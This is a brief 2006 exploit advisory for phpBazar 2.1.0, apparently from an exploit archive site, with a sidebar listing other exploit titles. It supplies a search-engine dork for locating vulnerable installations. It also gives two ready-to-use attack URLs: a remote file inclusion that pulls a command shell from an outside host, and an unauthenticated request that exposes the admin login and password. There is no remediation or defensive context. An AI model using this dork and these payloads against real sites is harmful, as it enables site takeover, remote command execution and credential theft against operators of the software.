exploits , vulnerabilities , articles , phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities

2006-05-19

phpBazar <= 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities

Rated as : High Risk

Title: phpBazar <= 2.1.0 Multiple vulnerabilites
URL: http://www.smartisoft.com/
Dork: inurl:classified.php phpbazar

Exploits:
-remote file inclusion:
/classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
-access to admin login and password:
/admin/admin.php?action=edit_member&value=1
securitydot.net - 2006-05-19

Exploits - newest 10 RSS | More

2007-06-15 56330 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33540 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41708 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28865 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19377 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16393 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19040 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16266 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33135 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16917 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit